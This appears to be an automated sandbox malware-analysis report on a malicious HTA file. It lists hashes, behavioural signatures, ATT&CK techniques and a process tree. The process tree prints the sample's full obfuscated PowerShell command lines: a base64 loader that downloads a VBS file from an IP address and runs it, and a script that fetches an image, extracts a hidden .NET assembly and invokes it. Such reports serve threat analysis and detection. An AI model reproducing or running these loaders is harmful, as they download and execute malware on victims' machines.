2a7f932fb984d3485eb721810e58cf929a1d1fe719d3b29e15f4f7ef0d4ad8a9

General

Target

creatingthingswithgoodnews.hta
Size

47KB
MD5

15d8b7e5f5bd86deb3bcf73b6061055c
SHA1

3179de79caea710c656c0d1cfa87c384b101386e
SHA256

2a7f932fb984d3485eb721810e58cf929a1d1fe719d3b29e15f4f7ef0d4ad8a9
SHA512

860f3e6da3c2696a435878c6ab3619274d112b3ef10512e2805145a33e63126daa49745d3571b88f9b8c957e0255077f821d943ad4a88f4a0b425acd8667bb8f
SSDEEP

192:iVMAWvOBSclFWvOLvKrYbnywoR/6cTKocHncCceWvOtcew7lvRvcT:WiOsIFiOLir0ywESto6nx3iOtM7lvRvw

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

exe.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2676	powershell.exe
6	2848	powershell.exe
7	2848	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2676	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2848	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2676	powershell.exe
2848	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2776	2168	mshta.exe	30
PID 2168 wrote to memory of 2776	2168	mshta.exe	30
PID 2168 wrote to memory of 2776	2168	mshta.exe	30
PID 2168 wrote to memory of 2776	2168	mshta.exe	30
PID 2776 wrote to memory of 2676	2776	cmd.exe	32
PID 2776 wrote to memory of 2676	2776	cmd.exe	32
PID 2776 wrote to memory of 2676	2776	cmd.exe	32
PID 2776 wrote to memory of 2676	2776	cmd.exe	32
PID 2676 wrote to memory of 2668	2676	powershell.exe	33
PID 2676 wrote to memory of 2668	2676	powershell.exe	33
PID 2676 wrote to memory of 2668	2676	powershell.exe	33
PID 2676 wrote to memory of 2668	2676	powershell.exe	33
PID 2668 wrote to memory of 2604	2668	csc.exe	34
PID 2668 wrote to memory of 2604	2668	csc.exe	34
PID 2668 wrote to memory of 2604	2668	csc.exe	34
PID 2668 wrote to memory of 2604	2668	csc.exe	34
PID 2676 wrote to memory of 708	2676	powershell.exe	36
PID 2676 wrote to memory of 708	2676	powershell.exe	36
PID 2676 wrote to memory of 708	2676	powershell.exe	36
PID 2676 wrote to memory of 708	2676	powershell.exe	36
PID 708 wrote to memory of 2848	708	WScript.exe	37
PID 708 wrote to memory of 2848	708	WScript.exe	37
PID 708 wrote to memory of 2848	708	WScript.exe	37
PID 708 wrote to memory of 2848	708	WScript.exe	37

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingthingswithgoodnews.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PowErsHelL -ex undEfinED -nop -W 1 -C dEViCecrEdeNtiaLdEPLOyMeNt.Exe ; InVOkE-eXPReSsiOn($(iNvoKe-eXpResSIoN('[sYSTEM.tExT.ENCODInG]'+[ChaR]58+[Char]0x3a+'UTF8.geTsTRInG([sySTeM.CoNVert]'+[chaR]0x3A+[cHar]58+'FROmBAsE64StRIng('+[CHAr]34+'JFpFY3FqR0U0OCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZVJEZWZpbmlUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ0WlVrRWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtueURuR1Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNoWG1xSSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpURm1UeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV05qRGlkRUspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlZzS3F2RGlTblB4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1jICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFpFY3FqR0U0ODo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMTA0LzgwL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpcmUudElGIiwiJGVOdjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyIsMCwwKTtzdEFyVC1TTGVFcCgzKTtJbnZPa2UtZVhwUkVzc0lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyI='+[CHAr]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowErsHelL -ex undEfinED -nop -W 1 -C dEViCecrEdeNtiaLdEPLOyMeNt.Exe ; InVOkE-eXPReSsiOn($(iNvoKe-eXpResSIoN('[sYSTEM.tExT.ENCODInG]'+[ChaR]58+[Char]0x3a+'UTF8.geTsTRInG([sySTeM.CoNVert]'+[chaR]0x3A+[cHar]58+'FROmBAsE64StRIng('+[CHAr]34+'JFpFY3FqR0U0OCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZVJEZWZpbmlUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ0WlVrRWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtueURuR1Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNoWG1xSSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpURm1UeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV05qRGlkRUspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlZzS3F2RGlTblB4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1jICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFpFY3FqR0U0ODo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMTA0LzgwL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpcmUudElGIiwiJGVOdjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyIsMCwwKTtzdEFyVC1TTGVFcCgzKTtJbnZPa2UtZVhwUkVzc0lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0ZWRiZXN0dGhpbmdzd2l0aG1lZ2l2ZW5tZWdvb2R0aGluZ3Nmb3JlbnRpLnZiUyI='+[CHAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6aebfppw.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2668
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF078.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF077.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2604
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdbestthingswithmegivenmegoodthingsforenti.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:708
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.emroflriglufi#uaebsiehs/08/401.302.532.51//:p##h';$restoredText = $originalText -replace '#', 't';$Grasso = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$Orvieto = New-Object System.Net.WebClient;$kryptopyrrole = $Orvieto.DownloadData($Grasso);$salinometers = [System.Text.Encoding]::UTF8.GetString($kryptopyrrole);$sulking = '<<BASE64_START>>';$InfiniBand = '<<BASE64_END>>';$overdramatize = $salinometers.IndexOf($sulking);$timelord = $salinometers.IndexOf($InfiniBand);$overdramatize -ge 0 -and $timelord -gt $overdramatize;$overdramatize += $sulking.Length;$funambulation = $timelord - $overdramatize;$jiggles = $salinometers.Substring($overdramatize, $funambulation);$talons = -join ($jiggles.ToCharArray() | ForEach-Object { $_ })[-1..-($jiggles.Length)];$occluders = [System.Convert]::FromBase64String($talons);$thalis = [System.Reflection.Assembly]::Load($occluders);$correctnesses = [dnlib.IO.Home].GetMethod('VAI');$correctnesses.Invoke($null, @($restoredText, 'hereon', 'hereon', 'hereon', 'CasPol', 'hereon', 'hereon','hereon','hereon','hereon','hereon','hereon','1','hereon','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6aebfppw.dll

Filesize
3KB

MD5
d870fd8845b463c3a491be57ddbb5128

SHA1
0532ad0b63bbe212acc488c33eefbe9dbd3764fd

SHA256
a9b43a18a6c3bb57e2a3a5f6e8f87e2d5088e59363893b1c254ac42c97669ac0

SHA512
0dd424634eba18ff278c08e3f8fc79f2dcfeb1bb779ce8891cedbe8a477121a75cfcf74e3955a3732ee14c4f9fb7ae0d8949a78755df0c50eb64d776fd06ccf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\6aebfppw.pdb

Filesize
7KB

MD5
6360b981ab057a8330150f1040d28fba

SHA1
654c3c33a7773bc55c7d3828b5110d1086c896a9

SHA256
dac92462da6526cf8cdb1b115edaa9dba0463c77569bb569aca6372b3bd361e1

SHA512
e3a0882931d1c06ed1ad3b311fceb6ba0b16bf4bb9e66793b1842f3e152d6cea933c078538989b2d48828154613f59d58964d0cfade764035dc008bb67df94f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF078.tmp

Filesize
1KB

MD5
973f2e23c661c3b3b7a720633f40ed21

SHA1
77c48618c9e26fd11fc329a97935d99bc3816ccd

SHA256
d4553d9360d0eccfb9c234b766700872caa124c7830c0266564ab5abda87502d

SHA512
84b21eae76859377031dde6f1a6417d5c5fa531470bec19569992770f5aeeb1c41177b52205f604d7c450e3ff59542dfc4531018c26e51f9ef5e5db4bfd11d80

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5a3989d579566d38467342be637084b5

SHA1
cab685da318c73d9fc5696171e62b0da3c5476a3

SHA256
d6b183ce87b29022c65f0d8ce06dd17c3debe26307296d9b18e179c62035db3a

SHA512
8e244902dfca5b0e909dc9a068f7ab9b0dbec8af53ec482fea744eea90988d58f130803f6f8b1f3211e031cc6a37fc48b9dc496a8f173e2759c941cc0ad85929

Download Submit
C:\Users\Admin\AppData\Roaming\createdbestthingswithmegivenmegoodthingsforenti.vbS

Filesize
225KB

MD5
73f356f3d97612af68b546898f5a623e

SHA1
f625bf9c945f63a203a491cab55883343bc8f155

SHA256
4db02c0003eed7179bf597b6ebb7ff1a7dec4fd3714ec804c9b77e471cbfb03e

SHA512
9471927e26db1f306ece3d0b803006bc921d66a045a9bdccf83c0e5aea209f43ca3a45f851f5ec2d76753f965b0bc14b436634d57e09c55c35c5b5f81625fe58

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6aebfppw.0.cs

Filesize
486B

MD5
7820cc88041232a1bd073f1bc336c75d

SHA1
39216f5f3886f125d140d8b583eb2e99a67452a2

SHA256
24ae2b2c9b2fb8cb9d853d1bc03801cd9385d4945fd45695c009da551cb2b943

SHA512
3c098fcc5b147a23c54f822559cb924bbddc1f55166e4f3d95211fe4e043de1ef8d33a494dd2d956a9aff344543f8609018b10927622b2552aed78c41efff3ab

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6aebfppw.cmdline

Filesize
309B

MD5
fd61cdca5066d8a5b9d40d9cddf9a800

SHA1
a0f5b0924c0256cac96739aea41fcbf23fb18a92

SHA256
54b79a8283284f8450228738b84560f542d327f3e14ee6e5eb6a61e847aa757d

SHA512
3de3ca8cb3ebdaaff96acfa04062f512e41ce7b492744fda876c0821cb197c055942f69041f96240bd846b46025e77d55078095bd50130545e27f959f606cab5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF077.tmp

Filesize
652B

MD5
aca1ce5ae0556c39b33e68ff53816746

SHA1
42f41f1d5eeff9c79a5b462f498df2005b82573d

SHA256
2c1cac32f24b42e221cef79225cb9970652c7d0eafa554dcf30dd07bd04d667e

SHA512
575d790e2133fbcd02aa72c9a898b4734acebed4423950ef301c064f51b672c44eaeb0f361482f687942a6d0a77cae1ccf1818db225bea08ebfd7daa51bc7120

Download Submit

Analysis

Sharing